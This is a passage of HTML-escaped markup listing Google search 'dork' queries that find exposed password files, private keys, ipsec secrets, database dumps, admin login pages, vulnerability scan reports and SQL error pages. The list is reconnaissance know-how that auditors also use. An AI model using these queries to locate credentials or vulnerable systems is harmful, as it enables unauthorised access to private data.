/&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Big Sister” +”OK Attention Trouble”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”curriculum vitae” filetype:doc&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”edna:streaming mp3 server” -forums&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”FTP root at”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”index of” +myd size&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Index Of” -inurl:maillog maillog size&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Index Of” cookies.txt size&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”index of” mysql.conf OR mysql_config&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Index of” upload size parent directory&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”index.of *” admin news.asp configview.asp&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”index.of” .diz .nfo last modified&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Joomla – Web Installer”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”LOGREP – Log file reporting system” -site:itefix.no&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Multimon UPS status page”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”PHP Advanced Transfer” (inurl:index.php | inurl:showrecent.php )&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”PhpMyExplorer” inurl:”index.php” -cvs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”statistics of” “advanced web statistics”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”System Statistics” +”System and Network Information Center”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”urchin (5|3|admin)” ext:cgi&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Usage Statistics for” “Generated by Webalizer”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”wbem” compaq login “Compaq Information Technologies Group”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Web Server Statistics for ****”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”web server status” SSH Telnet&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Welcome to F-Secure Policy Manager Server Welcome Page”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”welcome.to.squeezebox”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:admin intitle:login&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:Bookmarks inurl:bookmarks.html “Bookmarks&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:index.of “Apache” “server at”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:index.of cleanup.log&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:index.of dead.letter&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:index.of inbox&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:index.of inbox dbx&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:index.of ws_ftp.ini&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:intranet inurl:intranet +intext:”phone”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”/axs/ax-admin.pl” -s?ri?t&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”/cricket/grapher.cgi”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”bookmark.htm”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”cacti” +inurl:”graph_view.php” +”Settings Tree View” -cvs -RPM&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”newsletter/admin/”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”newsletter/admin/” intitle:”newsletter admin”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”putty.reg”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”smb.conf” intext:”workgroup” filetype:conf conf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:*db filetype:mdb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/cgi-bin/pass.txt&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/_layouts/settings&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:admin filetype:xls&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:admin intitle:login&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:backup filetype:mdb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:build.err&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:cgi-bin/printenv&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:cgi-bin/testcgi.exe “Please distribute TestCGI”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:changepassword.asp&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:ds.py&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:email filetype:mdb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:fcgi-bin/echo&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:forum filetype:mdb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:forward filetype:forward -cvs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:getmsg.html intitle:hotmail&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:log.nsf -gov&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:main.php phpMyAdmin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:main.php Welcome to phpMyAdmin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:netscape.hst&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:netscape.hst&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:netscape.ini&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:odbc.ini ext:ini -cvs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:perl/printenv&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:php.ini filetype:ini&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:preferences.ini “[emule]”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:profiles filetype:mdb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:report “EVEREST Home Edition ”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:server-info “Apache Server Information”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:server-status “apache”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:snitz_forums_2000.mdb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:ssl.conf filetype:conf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:tdbin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:vbstats.php “page generated”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:wp-mail.php + “There doesn’t seem to be any new mail.”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:XcCDONTS.asp&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ipsec.conf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ipsec.secrets&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ipsec.secrets&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Lotus Domino address books&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;mail filetype:csv -site:gov intext:name&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Microsoft Money Data Files&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;mt-db-pass.cgi files&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;MySQL tabledata dumps&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;mystuff.xml – Trillian data files&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;OWA Public Folders (direct view)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Peoples MSN contact lists&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;php-addressbook “This is the addressbook for *” -warning&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;phpinfo()&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;phpMyAdmin dumps&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;phpMyAdmin dumps&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;private key files (.csr)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;private key files (.key)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Quicken data files&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;rdbqds -site:.edu -site:.mil -site:.gov&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;robots.txt&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;site:edu admin grades&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;site:www.mailinator.com inurl:ShowMail.do&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;SQL data dumps&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Squid cache server reports&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Unreal IRCd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;WebLog Referrers&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Welcome to ntop!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Fichier contenant des informations sur le r?seau :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:log intext:”ConnectionManager2″&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“apricot – admin” 00h&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“by Reimar Hoven. All Rights Reserved. Disclaimer” | inurl:”log/logdb.dta”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Network Host Assessment Report” “Internet Scanner”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Output produced by SysWatch *”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Phorum Admin” “Database Connection” inurl:forum inurl:admin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;phpOpenTracker” Statistics&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“powered | performed by Beyond Security’s Automated Scanning” -kazaa -example&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Shadow Security Scanner performed a vulnerability assessment”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“SnortSnarf alert page”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“The following report contains confidential information” vulnerability -search&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“The statistics were last upd?t?d” “Daily”-microsoft.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“this proxy is working fine!” “enter *” “URL***” * visit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“This report lists” “identified by Internet Scanner”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Traffic Analysis for” “RMON Port * on unit *”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Version Info” “Boot Version” “Internet Settings”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;((inurl:ifgraph “Page generated at”) OR (“This page was built using ifgraph”))&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Analysis Console for Incident Databases&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:cfg radius.cfg&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:cgi intext:”nrg-” ” This web page was created on ”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:pdf “Assessment Report” nessus&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:php inurl:ipinfo.php “Distributed Intrusion Detection System”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:php inurl:nqt intext:”Network Query Tool”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:vsd vsd network -samples -examples&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”Welcome to the Web V.Networks” intitle:”V.Networks [Top]” -filetype:htm&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”ADSL Configuration page”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Azureus : Java BitTorrent Client Tracker”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Belarc Advisor Current Profile” intext:”Click here for Belarc’s PC Management products, for large and small companies.”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”BNBT Tracker Info”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Microsoft Site Server Analysis”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Nessus Scan Report” “This file was generated by Nessus”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”PHPBTTracker Statistics” | intitle:”PHPBT Tracker Statistics”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Retina Report” “CONFIDENTIAL INFORMATION”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”start.managing.the.device” remote pbx acc&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”sysinfo * ” intext:”Generated by Sysinfo * written by The Gamblers.”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”twiki” inurl:”TWikiUsers”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”/catalog.nsf” intitle:catalog&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”install/install.php”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”map.asp?” intitle:”WhatsUp Gold”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”NmConsole/Login.asp” | intitle:”Login – Ipswitch WhatsUp Professional 2005″ | intext:”Ipswitch WhatsUp Professional 2005 (SP1)” “Ipswitch, Inc”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”sitescope.html” intitle:”sitescope” intext:”refresh” -demo&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/adm-cfgedit.php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/cgi-bin/finger? “In real life”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/cgi-bin/finger? Enter (account|host|user|username)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/counter/index.php intitle:”+PHPCounter 7.*”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:CrazyWWWBoard.cgi intext:”detailed debugging information”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:login.jsp.bak&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:ovcgi/jovw&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:phpSysInfo/ “created by phpsysinfo”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:portscan.php “from Port”|”Port Range”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:statrep.nsf -gov&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:status.cgi?host=all&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:testcgi xitami&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:webutil.pl&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Looking Glass&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;site:netcraft.com intitle:That.Site.Running Apache&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“A syntax error has occurred” filetype:ihtml&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“access denied for user” “using password”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“An illegal character has been found in the statement” -”previous message”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“ASP.NET_SessionId” “data source=”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Can’t connect to local” intitle:warning&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Chatologica MetaSearch” “stack tracking”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“detected an internal error [IBM][CLI Driver][DB2/6000]”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“error found handling the request” cocoon filetype:xml&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Fatal error: Call to undefined function” -reply -the -next&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Incorrect syntax near”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Incorrect syntax near”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Internal Server Error” “server at”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Invision Power Board Database Error”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“ORA-00933: SQL command not properly ended”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“ORA-12541: TNS:no listener” intitle:”error occurred”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Parse error: parse error, unexpected T_VARIABLE” “on line” filetype:php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“PostgreSQL query failed: ERROR: parser: parse error”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Supplied argument is not a valid MySQL result resource”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Syntax error in query expression ” -the&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“The s?ri?t whose uid is ” “is not allowed to access”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“There seems to have been a problem with the” ” Please try again by clicking the Refresh button in your web browser.”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Unable to jump to row” “on MySQL result index” “on line”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Unclosed quotation mark before the character string”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Warning: Bad arguments to (join|implode) () in” “on line” -help -forum&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Warning: Cannot modify header information – headers already sent”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Warning: Division by zero in” “on line” -forum&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Warning: mysql_connect(): Access denied for user: ‘*@*” “on line” -help -forum&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Warning: mysql_query()” “invalid query”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Warning: Supplied argument is not a valid File-Handle resource in”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Warning:” “failed to open stream: HTTP request failed” “on line”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Warning:” “SAFE MODE Restriction in effect.” “The s?ri?t whose uid is” “is not allowed to access owned by uid 0 in” “on line”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“SQL Server Driver][SQL Server]Line 1: Incorrect syntax near”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;An unexpected token “END-OF-STATEMENT” was found&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Coldfusion Error Pages&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:asp + “[ODBC 